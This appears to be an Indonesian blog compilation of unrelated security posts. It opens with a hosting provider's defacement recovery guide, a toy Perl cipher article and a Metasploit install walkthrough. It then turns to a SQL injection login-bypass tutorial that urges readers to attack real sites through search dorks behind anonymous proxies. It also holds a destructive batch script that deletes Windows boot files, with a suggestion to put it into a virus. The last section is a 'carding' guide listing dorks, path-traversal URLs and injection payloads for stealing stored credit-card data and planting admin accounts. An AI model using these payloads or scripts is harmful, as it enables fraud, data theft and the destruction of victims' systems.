Troubleshooting hacking website

Masalah


Memang aksi hacking (terutama deface) website cukup popular akhir-akhir ini. Kemungkinan website Anda akan dicoba dihack/dideface lebih besar jika website Anda popular atau menggunakan aplikasi-aplikasi terkenal yang salah satu versinya mungkin memiliki lubang keamanan, seperti Mambo/Joomla, PHPBB, dll.

Dihacknya website Anda belum tentu berarti secara keseluruhan server hosting tidak aman. Jika memang terdapat kelemahan pada server hosting, maka biasanya ini akan kami beritakan kepada klien dan kami tutup/update sesegera mungkin.

Bisa saja (dan biasanya) hanya account atau website Anda saja yang dihack/terkompromikan. Karena di server hosting sebuah account bebas menjalankan skrip apa saja, maka jika terdapat kelemahan keamanan pada skrip tersebut, bisa saja pihak ketiga memperoleh akses melaluinya.

Berikut ini beberapa langkah yang dapat Anda tempuh untuk mengatasi masalah ini:



dari sisi aplikasi

* Pastikan Anda menggunakan versi terbaru dari aplikasi web yang Anda pakai. Kunjungi website aplikasi yang Anda pakai, misalnya untuk PHPBB adalah http://www.phpbb.com , untuk Joomla adalah http://www.joomla.org . Kadang sebuah aplikasi memiliki fitur upgrade online, jika ya dapat Anda gunakan fasilitas tersebut. Jika tidak, lakukan upgrade manual sesuai instruksi yang diberikan.

* Coba cek apakah masih ada sisa-sisa file dari penyusup yang ditaruh di website Anda. Biasanya penyusup mengupload file seperti CGI/PHP Shell. Coba cek juga apakah si penyusup membuat account administrator atau moderator pada aplikasi website Anda.

* Jika Anda membuat program sendiri, periksa kembali keamanan program Anda. Sebaiknya banyak membaca buku-buku tentang pemrograman yang aman (secure programming), banyak membaca artikel soal keamanan pemrograman web, dan memperbanyak pengalaman seputar pemrograman.

* PHP: php.ini, error_reporting



dari sisi setting server hosting

* Sebaiknya mengganti password FTP atau shell/SSH Anda, karena siapa tahu telah diketahui/dipakai orang.

Catatan: Untuk mengetahui apakah ada yang login ke SSH, caranya adalah dengan mengetikkan perintah 'last' dari shell Linux. Jika ada IP yang tidak dikenal (bukan dari IP Anda biasa login) maka kemungkinan ada orang lain yang login menggunakan account Anda.

* Cobalah menjalankan skrip sebagai cgi-USER dan bukan USER, sehingga jika aplikasi website/skrip Anda diexploit, si penyusup tidak bisa begitu saja mengupload file ke document root Anda. Silakan lihat artikel ini untuk lebih detilnya.

* Jika Anda menggunakan PHP, pastikan setting php.ini register_globals dan allow_url_fopen off, kecuali Anda benar-benar membutuhkannya. Silakan lihat artikel ini untuk detilnya.

* Jika Anda sama sekali tidak menggunakan skrip/aplikasi di website Anda, Anda dapat mematikan fitur skrip, untuk keamanan. Dari control panel, pilih Subdomain Manager lalu Prefs pada subdomain yang diinginkan, lalu pada pilihan "Situs ini dapat menjalankan skrip (CGI/PHP/dsb)", pilih (x) Tidak/disable.

* Anda juga dapat mencoba menghidupkan setting berikut ini di control panel: "Gunakan RBL" [x] Aktif. Dengan setting ini, website Anda akan dilindungi dari IP-IP yang mencurigakan, tapi ada kemungkinan sebagian pengunjung Anda tidak dapat mengakses website Anda. Anda bisa mencoba-cobanya terlebih dahulu.

* Cobalah menghidupkan setting Log output stderr skrip ke file di Subdomain preferences control panel. Ini membuat pesan error ke stderr yang dicetak oleh skrip tidak ditampilkan ke browser melainkan dicetak ke file log (di sites/NAMASITE/syslog/script_error.YYYY-MM-DD.log). Pesan kesalahan skrip bisa saja mengandung informasi sensitif seperti password, path, dsb sehingga ada baiknya tidak usah bisa dilihat oleh semua pengunjung website.

* Karena server hosting yang menggunakan Spanel secara default memungkinkan mengakses phpMyAdmin dan phpPgAdmin dari setiap website (via URL http://NAMAWEBSITE/webapps/phpMyAdmin atau http://NAMAWEBSITE/webapps/phpPgAdmin), maka pastikan username dan/atau dbname Anda tidak diketahui orang (mis: lewat pesan error PHP atau cara lain). Dan pastikan password database cukup kuat (mis: minimal 6-8 huruf, bukan kata/huruf yang mudah ditebak seperti "123" atau sama dengan username/dbname). Meskipun secara default koneksi remote MySQL tidak diperbolehkan saat ini dari server hosting, namun lewat aplikasi phpMyAdmin/phpPgAdmin, database Anda masih dapat diakses secara remote.

Jika Anda ingin agar phpMyAdmin dan phpPgAdmin tidak tersedia, matikan lewat control panel (menu Preferences).
dari sisi database

* Jika ada file atau database yang dihapus, upload kembali dari backup Anda atau dari backup server. Di server hosting disimpan backup harian dan histori backup selama 3 bulan. Dapat Anda akses dan ambil dari File Manager control panel, di volume Backup atau Backup History (lalu gunakan fasilitas copy paste clipboard untuk mengkopinya kembali ke website Anda, yaitu volume Data). Sebaiknya Anda memelihara backup juga secara teratur. Jika Anda mengalami kesulitan, Anda dapat meminta staf technical support kami untuk merestorekan dari backup server.

* XXX SQL injection.



Jika masih ada masalah, silakan hubungi staf technical support kami.

Sekilas tentang kriptografi

______ _ _____
___ __ _(_) __|___ __| |___|____ |
/ _ \ / _` | |\ \ / _ \ / _` |__ \ |_ |
\__ | | | | |_\ \ (_) | | | |__) |__| |
|___/|_| |_|_|____\___/|_| |_|___/_____|


[ echo|zine, volume 6 issue 19 ]

cryptography : Simple a-symetric algorithm
Brought To You By : x-diamond1
email: kim_diamond1/et/yahoo/dot/com


======= Pengantar ---|

Aku kali ini akan mencoba sharing pengetahuan tentang kriptografi, mohon maaf
bila pengetahuan yang aku bagi begitu dangkal

=== I. Sekilas tentang kriptografi

Secara umum adalah ilmu dan seni untuk menjaga kerahasiaan berita
ilmu yang mempelajari teknik matematika yang berhubungan dengan aspek
keamanan informasi seperti : - Kerahasiaan data
- keabsahan data
- integritas data
- autentikasi

untuk pengertian tersebut teman-teman bisa melihat detailnya di
wikipedia...:P karena aku ambil bahannya dari situ


=== II. Algoritma Sandi

Nah untuk melakukan tujuan kriptografi tersebut digunakanlah algoritma sandi,
semakin kuat algoritma sandi yang digunakan maka kriptanalis/code
breaker(pemecah sandi) tersebut akan semakin sulit. Dasar matematis yang
mendasari proses enkripsi dan dekripsi adalah relasi antara dua himpunan yaitu
yang berisi elemen teks terang /plaintext dan yang berisi elemen teks
sandi/ciphertext. Enkripsi dan dekripsi merupakan fungsi transformasi antara
himpunan-himpunan tersebut. Apabila elemen-elemen teks terang dinotasikan
dengan P, elemen-elemen teks sandi dinotasikan dengan C, sedang untuk proses
enkripsi dinotasikan dengan E, dekripsi dengan notasi D.

Enkripsi : E(P) = C
Dekripsi : D(C) = P atau D(E(P)) = P

untuk mempertegas : Enkripsi adalah proses menyandi/merubah plain teks menjadi
cipher teks Dekripsi adalah proses membuka sandi/merubah cipher teks menjadi
plain teks

Berdasarkan kunci yang digunakan untuk enkripsi dan dekripsi, maka algoritma
sandi dibagi menjadi dua macam :

1. simetrik ==> kunci untuk enkripsi dan dekripsi adalah sama, contoh :
stream cipher, blok cipher

2. a-simetrik ==> kunci untuk enkripsi dan dekripsi adalah berbeda,
contoh : RSA, ELGAMAL, dll


======= Fokus a-simetrik ---|

Tadi sudah aku jelaskan sedikit tentang algoritma sandi, sekarang aku mau
fokuskan ke dalam algoritma sandi a-simetrik. Salah satu ilmu matematik yang
mendukung algoritma a-simetrik adalah number theory (teori bilangan), number
theory ini sangat menarik, aku menghabiskan waktu 2 semester untuk
mempelajarinya. Mari kita mulai sedikit number theory

#konsep inverse modular

a*b mod N = 1

jika a adalah suatu bilangan integer dikalikan dengan bilangan integer lainnya
misalnya b, kemudian dimodularkan dengan integer N menghasilkan nilai 1, maka b
adalah inverse dari a atau a adalah inverse dari b.

BINGUNG...???? :P

aku berikan contoh :

a=2; b=6; N=11;

maka (2*6) mod 11
= 12 mod 11
= 1

artinya 6 adalah adalah inverse dari 2, atau 2 adalah inverse dari 6

======= Implementasi ---|

Dari konsep inverse modular tadi, aku membuat algoritma sandi a-simetrik
sederhana bernama kardel-a. Konsep algoritmanya seperti berikut :

-pilih dua buah bilangan a dan b, sedemikian hingga a dan b memenuhi konsep
inverse modular
-bilangan a adalah kunci enkripsi
-bilangan b adalah kunci dekripsi

rumus algoritma kardel-a==> enkripsi : (P)*a mod N = C
dekripsi : (C)*b mod N = P

contoh implementasi :

a=3; #sebagai kunci enkripsi
b=171; #sebagai kunci dekripsi
N=256;


----------- Proses Enkripsi ------------------------------

Plain teks : "xdiamond1" <== tanpa tanda kutip

proses : - ubah setiap huruf menjadi bilangan desimal ascii
x = 120
d = 100
i = 105
a = 97
m = 109
o = 111
n = 110
d = 100
1 = 49

- enkripsi ==> (120)*3 mod 256 = 104
(100)*3 mod 256 = 44
. . .
. . .
. . .
(49)*3 mod 256 = 147

- ubah bilangan hasil enkripsi menjadi karakter

Cipher teks nya adalah : "h,;#GMJ,ô" <==tanpa tanda kutip..

------------ Proses Enkripsi Selesai ---------------------


------------ Proses Dekripsi -----------------------------

cipher teks : "h,;#GMJ,ô" <==tanpa tanda kutip

proses : - ubah setiap huruf menjadi bilangan desimal ascii
h = 104
, = 44
; = 59
# = 35
G = 71
M = 77
J = 74
, = 44
ô = 147

- dekripsi ==> (104)*171 mod 256 = 120
(44)*171 mod 256 = 100
. . .
. . .
. . .
(147)*171 mod 256 = 49

- ubah bilangan hasil dekripsi menjadi karakter

Plain teksnya adalah : xdiamond1

----------- Proses Dekripsi Selesai ----------------------

======= Source Code Program ---|

aku juga membuat programnya menggunakan perl, mungkin rekan-rekan mau
mencobanya....:P


------------ enkripsi.pl ---------------------------------
#!/usr/bin/perl -w
#mode enkripsi
#by xdiamond1

print "\nPlain teks : ";
chomp($plain=);
print "Kunci Enkrip : ";
chomp($ke=);
@word=split("",$plain);
$jml=scalar(@word);
&enkrip;

sub enkrip
{
for($i=0; $i<$jml; $i++)
{
$konv1[$i]=ord($word[$i]);
$pro[$i]=($konv1[$i]*$ke)%256;
$konv2[$i]=chr($pro[$i]);
}
$gab=join("",@konv2);
print "Cipher teks : $gab\n";
}
------------- enkripsi.pl ----------------------------------


------------- dekripsi.pl ----------------------------------
#!/usr/bin/perl -w
#mode dekripsi
#by xdiamond1

print "\nCipher teks : ";
chomp($plain=);
print "Kunci Dekrip : ";
chomp($kd=);
@word=split("",$plain);
$jml=scalar(@word);
&dekrip;

sub dekrip
{
for($i=0; $i<$jml; $i++)
{
$konv1[$i]=ord($word[$i]);
$pro[$i]=($konv1[$i]*$kd)%256;
$konv2[$i]=chr($pro[$i]);
}
$gab=join("",@konv2);
print "Plain teks : $gab\n";
}
------------ dekripsi.pl -----------------------------------

======= Penutup ---|

ho..ho..ho...dah selesai, aku rasa tulisanku kali ini dah cukup
semoga rekan-rekan tertarik dengan kriptografi dan mau mengembangkannya,
sekali lagi aku mohon maaf klo pengetahuan yang aku share ini sangat jauh dari sempurna..

======= Greetz ---|

[1] Allah, tuhan penciptaku
[2] Ayah&ibu, lambang, lian, daffa
[3] my love Susi
[3] y3dips, dan echo staff lainnya
[4] freak 'abe' einstein
[5] readyforuse20
[6] ethan0ir
[7] sigit2003
[8] dan penghuni LKTI lainnya

======= Referensi ---|

[1] http://id.wikipedia.org/wiki/Kriptografi
[2] cryptanalysis number theory
[3] kreasiku sendiri

*- $e19dot005dottxt - echo|zine - issue#19 - 080808 -*

Instalasi Metasploit Framework

Apa itu Metasploit Framework ?

Metasploit Framework adalah sebuah platform pengembangan untuk membuat tool keamanan dan exploit. Metasploit framework digunakan oleh profesional bidang keamanan jaringan untuk melakukan tes penetrasi, digunakan juga oleh administrator sistem untuk memverifikasi instalasi dan patch sistemnya, vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di dunia. Metasploit framework ditulis menggunakan bahasa pemrograman Ruby dan termasuk juga komponen lainnya yang ditulis dalam bahasa C dan assembler.

Terdiri dari apa saja?

Metasploit Framework terdiri dari tools, libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil, payload akan tereksekusi pada sistem target dan pengguna akan disediakan sebuah shell untuk berinteraksi dengan payload.
Download

Saat ini tersedia dalam versi 3.0. Dapat didownload di halaman ini : http://framework.metasploit.com/msf/download
Instalasi di Ubuntu

Saya tidak dapat menemukan paket metasploit ini di repositori nya Ubuntu, jadi harus mendownloadnya langsung dari website nya. Download dan simpan dalam direktori home.

Extract file hasil download:

k4tz@k4tz-desktop:~$ tar xvzf framework-3.0.tar.gz

k4tz@k4tz-desktop:~$ cd framework-3.0/

Metasploit framework versi 3.x dan yang sekarang digunakan ditulis dalam bahasa pemrograman Ruby, jadi kita memerlukan Ruby dan Librarynya. Dibawah ini instalasi Ruby dan Library yang kita perlukan.

k4tz@k4tz-desktop:~/framework-3.0$ sudo apt-get install ruby

k4tz@k4tz-desktop:~/framework-3.0$ sudo apt-get install libzlib-ruby

k4tz@k4tz-desktop:~/framework-3.0$ sudo apt-get install libopenssl-ruby

Metasploit framework sudah bisa digunakan, untuk mengeksekusi nya gunakan perintah :

k4tz@k4tz-desktop:~/framework-3.0$ sudo ./msfconsole

Password:


# # ###### ##### ## #### #####
# #### # #####

## ## # # # # # #
# # # # # #

# ## # ##### # # # #### #
# # # # # #

# # # # ###### # #####
# # # # #

# # # # # # # # #
# # # # #

# # ###### # # # #### #
###### #### # #



=[ msf v3.0

+ -- --=[ 176 exploits - 104 payloads

+ -- --=[ 17 encoders - 5 nops

=[ 30 aux


msf >

Sampai tahap ini metasploit berjalan OK, terkecuali jika kita ingin menggunakan dalam bentuk web nya (web interface dari metasploit). Jika kita eksekusi ./msfweb maka masih akan kita temukan eror. Coba ikut petunjuk instalasi dibawah ini dan jangan lupa sebelumnya paket apache sudah harus terinstal di sistem kita.

k4tz@k4tz-desktop:~/framework-3.0$ sudo apt-get install rubygems

k4tz@k4tz-desktop:~/framework-3.0$ sudo ./msfweb


[*] Starting msfweb v3.0 on
http://127.0.0.1:55555/


Cannot find gem for Rails ~>1.2.2.0:

Install the missing gem with 'gem install -v=1.2.2 rails', or

change environment.rb to define
RAILS_GEM_VERSION with your desired version.

k4tz@k4tz-desktop:~/framework-3.0$ sudo gem install -v=1.2.2 rails

Bulk updating Gem source index for: http://gems.rubyforge.org

Install required dependency rake? [Yn] y

Install required dependency activesupport? [Yn] y

Install required dependency activerecord? [Yn] y

Install required dependency actionpack? [Yn] y

Install required dependency actionmailer? [Yn] y

Install required dependency actionwebservice? [Yn] y

Successfully installed rails-1.2.2

Successfully installed rake-0.7.3

Successfully installed activesupport-1.4.1

Successfully installed activerecord-1.15.2

Successfully installed actionpack-1.13.2

Successfully installed actionmailer-1.3.2

Successfully installed actionwebservice-1.2.2

Installing ri documentation for rake-0.7.3...

Installing ri documentation for activesupport-1.4.1...

Installing ri documentation for activerecord-1.15.2...

Installing ri documentation for actionpack-1.13.2...

Installing ri documentation for actionmailer-1.3.2...

Installing ri documentation for actionwebservice-1.2.2...

Installing RDoc documentation for rake-0.7.3...

Installing RDoc documentation for activesupport-1.4.1...

Installing RDoc documentation for activerecord-1.15.2...

Installing RDoc documentation for actionpack-1.13.2...

Installing RDoc documentation for actionmailer-1.3.2...

Installing RDoc documentation for actionwebservice-1.2.2...

k4tz@k4tz-desktop:~/framework-3.0$ sudo ./msfweb


[*] Starting msfweb v3.0 on
http://127.0.0.1:55555/


=> Booting WEBrick...

=> Rails application started on
http://127.0.0.1:55555

=> Ctrl-C to shutdown server; call
with --help for options

[2007-12-12 17:26:15] INFO WEBrick
1.3.1

[2007-12-12 17:26:15] INFO ruby 1.8.5
(2006-08-25) [x86_64-linux]

[2007-12-12 17:26:15] INFO
WEBrick::HTTPServer#start: pid=2833 port=55555

Biarkan program msfweb berjalan di terminal, jika ingin menghentikan cukup gunakan Ctrl-C. Buka browser dan ketik di url http://127.0.0.1:55555/.

Teknik hacking sql injection

Teknik hacking sql injection mulai muncul kepermukaan semenjak dijebolnya situs
KPU pada pemilu kemarin oleh Dani Firmansyah atau Xnuxer , dengan teknik ini beliau
dapat masuk sebagai web administrator tanpa susah payah scan port-port yang terbuka,
tanpa terdeteksi oleh firewall dan tanpa tool .ke situs KPU tersebut yang konon
katanya system yang seharga 152 milyar itu keamanannya berlapis lapis.

Apa yang kita bahas ini adalah basic atau dasar dasar dari teknik hacking yang
dinamakan sql injection , teknik ini memungkinkan kita masuk ke suatu system yang
terproteksi sebagai siapa saja dengan hanya mengetahui username tanpa harus
mengetahui passwordnya bahkan kita juga bisa login tanpa perlu mengetahui
username dan password sama sekali.

Sebagai ilustrasi helpercode mempunyai situs dengan nama www.helpercode.com , untuk
mengelola situs ini administrator membuat halaman web untuk aktifitas update semua
halaman web sehingga bisa dikelola darimanapun dan kapanpun , halaman web tersebut
tersimpan di www.helpercode.com /admin.asp , untuk mengamankan halaman2 yang
dikhususkan untuk web administrator ini , web admin membuat halaman web yang
terproteksi yang berfungsi sebagai pintu masuk ke halama2 berikutnya ,sehingga setiap
user yang akan masuk ke halaman halaman yang terproteksi harus memasukan username
dan password mereka , daftar password dan user tersebut tersimpan dalam sql server
dengan nama table admin dengan field field diantaranya username dan password.

Statement sql bukanlah bahasa pemrograman seperti pascal,Delphi atau visual basic,
statemen sql biasanya digunakan bersama sama dengan bahasa pemrograman lain pada
saat mengakses database , pada ilustrasi diatas , untuk mencocokan user yang login,
maka digunakan statemen sql yang kurang lebih sebagai berikut :

Select * from admin where username = input_username
And password = input_password

Sebagai contoh apabila penulis sebagai administrator dengan username = administrator
dan password = admin bermaksud login maka sql statemennya sebagai berikut :

Select * from admin where username = ‘administrator’ and
Password = ‘admin’

Dapat dipastikan bahwa apabila field username terdapat record administrator dengan filed
password terdapat admin penulis dapat melewati proteksi dan masuk kehalaman
berikutnya ,akan tetapi apabila sebaliknya ,maka akan keluar pesan kesalahan yang
kurang lebih isinya kita tidak bisa masuk ke halaman berikutnya , lalu bagaimana kalau
penulis memasukan input ‘ or ‘’=’ pada username dan password , perhatikan perubahan
statemen sql berikut ini :

Select * from admin where username = ‘’ or ‘’ = ‘’ and
Password = ‘’ or ‘’=’’

Logika OR menyebabkan statement membalikan nilai false jadi true sehingga kita bisa
masuk sebagai user yang terdapat pada record pertama dalam table admin ( record
pertama biasanya administrator) , dan bagaimana kalo kita hanya mengetahui username
saja tapi passwordnya tidak , misalkan username = administrator , caranya cukup
sederhana , pada text box tempat menginput username isi dengan “administrator’—“
sedangkan pada textbox password boleh diisi sembarang misalkan ‘ or ‘’=’ maka
statement sql akan berubah menjadi :

Select * from admin where username = ‘ administrator ‘—“
And password = ‘’ or ‘’=’’

Tanda “—“ (dua tanda minus) di sql server berarti akhir dari statement sql sehingga
perintah dibelakannya tidak dieksekusi lagi.

Untuk web admin , bagaimana cara mencegahnya , jangan izinkan user menginput
selain karakter a - z atau A - Z atau 0 – 9 , selain dari pada itu ditolak pada saat
pengecekan.

Sebenarnya dari teknik dasar sql injection ini , pembaca bisa mengembangkan teknik ini
sehingga ekses yang ditimbulkan akan lebih dasyat dari cuman sekedar bisa masuk
sebagai web administrator.

Penulis yakin bahwa sampai saat ini masih banyak situs situs yang bisa diekplor
memakai teknik sql injection dikarenakan ketidak tahuan para adminnya , apabila para
pembaca hendak mencobanya bisa mencari situs situs dengan menggunakan web
searching misalkan yahoo atau google , masukan keynya login.asp/php atau
admin.asp/php , tapi jangan merusaknya dan ingat aktifitas kita akan dicatat di log file
yang akan mencatat IP kita dan aktifitas kita , penulis sarankan menggunakan anonymous
proxy.

Code Penghancur Komputer

Itu judulnya serem amat yakh... langsung aja yakh
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

simpan penggalan script diatas notepad, dan simpan dgn file apa aja, yang penting berformat *.bat

yupz... badkiddies jelasin satu2 yakh scriptnya
del c:\autoexec.bat <-- buat hapus autoexe.bat di direktori C
del c:\boot.ini <---- buat hapus Boot.ini di direktori C
del c:\ntldr <--- buat hapus ntldr
del c:\windows\win.ini <----- untuk hapus file win.ini yang berlokasi di C:/windows

attrib -r -s -h <--- untuk menampilkan file ke 4 windows tadi yang di supper hidden

tanpa file autoexec.bat, boot.ini, ntldr, dan win.ini

komputer yang bersistem operasikan windows tdk akan mau hidup... hahahahahaha

ehm... skrg gmn kl code tadi di masukan dalam virus buatan kita... wew... yakin deh ga ada antivirus buat penawarnya kl sudah terinfeksi.. hahaahhaha...

14 Teknik Carding

Teknik - Teknik Carding :

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik --> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan -->
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya -->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik --> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik --> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
'admin'%20and%20fldpassword%20like%20'a%25'--
Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp



11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik --> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik --> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan --> ...&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template=order.log

13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik --> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik --> inurl:"/cart.php?m="
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : 'or"="
Password : 'or"="

.::Note!::..
I DONT TAKE ANY RESPONSIBLE FOR ANYTING... U TAKE UR OWN RISK..!!!